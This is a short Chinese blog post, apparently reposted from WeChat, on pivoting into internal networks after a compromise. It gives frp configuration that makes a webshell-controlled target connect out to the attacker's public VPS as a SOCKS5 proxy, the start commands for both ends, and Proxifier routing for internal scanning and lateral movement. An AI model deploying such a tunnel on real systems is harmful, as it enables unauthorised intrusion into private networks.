本文章前提需要公网服务器
公网靶场进行模拟
若在内网流量代理等有问题可后台私信
拓扑图
对于目标资产,拿下webshell后,上传frpc
和frpc.ini
frp
frpc.ini:放到目标资产
[common]server_addr = 公网服务器地址server_port = 7000 [socks5]type = tcpremote_port = 6000 plugin = socks5
frpc.ini:放到公网服务器
[common]bind_port = 7000
以上配置完成,进行启动
“
公网vps:
./frps -c frps.ini
webshell:
./frpc -c frpc.ini
Proxifier代理
这一步是将电脑的流量走公网
公网流量进行全局代理,更方便工具及其利用,在本地即可访问到内网
此时就能够实现流量代理
使用工具去对内网资产进行漏扫,验证全局代理和frp的配置
此时我们就能够使用windows工具进行内网横向去打,及其方便
原文始发于微信公众号(flowers-boy):关于内网代理、横向移动技巧
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论